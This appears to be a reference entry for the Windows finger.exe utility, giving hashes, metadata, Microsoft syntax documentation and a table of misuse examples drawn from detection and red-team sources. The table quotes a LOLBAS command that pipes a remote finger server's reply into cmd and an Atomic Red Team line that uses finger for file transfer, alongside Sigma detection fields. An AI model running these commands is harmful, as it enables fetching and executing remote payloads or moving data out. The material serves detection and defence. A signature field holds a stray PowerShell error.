finger.exe

  • File Path: C:\windows\SysWOW64\finger.exe
  • Description: TCPIP Finger Command

Hashes

Type Hash
MD5 B418085E38B594BF2B67912C0A47C823
SHA1 F0E388A44AF5E187873C2E587EC34BBE1477BAD9
SHA256 DCB9EECD222843185AB8E6722660894813EFA76FA6D4503AC54FCB0A5685936F
SHA384 EEA535AD8CEC2BDCD4014C7FAE026CBB4180F5F663372D043127D8713E2CFA06D261141BEF28B6BBB0F58A764D19AF2A
SHA512 95BA1F34EA167130EFDEBD8A9012BE66BAF8040114F9D1C15F221B5A2665DC7856BDC7DB970F2CA640A2CDEFA6FE687B4340CB2B2CB4230FB28C004882D857CC
SSDEEP 192:ZdjOGevsMYb5oXHDpDTTRfvo9F11uXMpURALsWL0WcW:jOGroXHJR4vuXtRWL0Wj

Signature

  • Status: The file C:\windows\SysWOW64\finger.exe is not digitally signed. You cannot run this script on the current system. For more information about running scripts and setting execution policy, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170
  • Serial: ``
  • Thumbprint: ``
  • Issuer:
  • Subject:

File Metadata

  • Original Filename: finger.exe.mui
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 6.3.9600.16384 (winblue_rtm.130821-1623)
  • Product Version: 6.3.9600.16384
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.

Possible Misuse

The following table contains possible examples of finger.exe being misused. While finger.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma proc_creation_win_susp_finger_usage.yml title: Finger.exe Suspicious Invocation DRL 1.0
sigma proc_creation_win_susp_finger_usage.yml description: Detects suspicious aged finger.exe tool execution often used in malware attacks nowadays DRL 1.0
sigma proc_creation_win_susp_finger_usage.yml Image\|endswith: '\finger.exe' DRL 1.0
sigma proc_creation_win_susp_finger_usage.yml - Admin activity (unclear what they do nowadays with finger.exe) DRL 1.0
LOLBAS Finger.yml Name: Finger.exe  
LOLBAS Finger.yml Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon  
LOLBAS Finger.yml - Command: finger user@example.host.com \| more +2 \| cmd  
LOLBAS Finger.yml Description: 'Downloads payload from remote Finger server. This example connects to "example.host.com" asking for user "user"; the result could contain malicious shellcode which is executed by the cmd process.'  
LOLBAS Finger.yml - Path: c:\windows\system32\finger.exe  
LOLBAS Finger.yml - Path: c:\windows\syswow64\finger.exe  
LOLBAS Finger.yml - IOC: finger.exe should not be run on a normal workstation.  
LOLBAS Finger.yml - IOC: finger.exe connecting to external resources.  
malware-ioc nouns.txt finger © ESET 2014-2018
atomic-red-team index.md - Atomic Test #16: File download with finger.exe on Windows [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #16: File download with finger.exe on Windows [windows] MIT License. © 2018 Red Canary
atomic-red-team T1105.md - Atomic Test #16 - File download with finger.exe on Windows MIT License. © 2018 Red Canary
atomic-red-team T1105.md ## Atomic Test #16 - File download with finger.exe on Windows MIT License. © 2018 Red Canary
atomic-red-team T1105.md Simulate a file download using finger.exe. Connect to localhost by default, use custom input argument to test finger connecting to an external server. MIT License. © 2018 Red Canary
atomic-red-team T1105.md https://www.bleepingcomputer.com/news/security/windows-10-finger-command-can-be-abused-to-download-or-steal-files/ MIT License. © 2018 Red Canary
atomic-red-team T1105.md finger base64_filedata@#{remote_host} MIT License. © 2018 Red Canary

Additional Info*

*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.


finger

Applies to: Windows Server 2022, Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server 2012

Displays information about users on a specified remote computer (typically a computer running UNIX) that is running the finger service or daemon. The remote computer specifies the format and output of the user information display. Used without parameters, finger displays help.

[!IMPORTANT] This command is available only if the Internet Protocol (TCP/IP) protocol is installed as a component in the properties of a network adapter in Network Connections.

Syntax

finger [-l] [<user>] [@<host>] [...]

Parameters

Parameter Description
-l Displays user information in long list format.
<user> Specifies the user about which you want information. If you omit the user parameter, this command displays information about all users on the specified computer.
@<host> Specifies the remote computer running the finger service where you are looking for user information. You can specify a computer name or IP address.
/? Displays help at the command prompt.
Remarks
  • You must prefix finger parameters with a hyphen (-) rather than a slash (/).

  • Multiple user@host parameters can be specified.

Examples

To display information for user1 on the computer users.microsoft.com, type:

finger user1@users.microsoft.com

To display information for all users on the computer users.microsoft.com, type:

finger @users.microsoft.com

Additional References


MIT License. Copyright (c) 2020-2021 Strontic.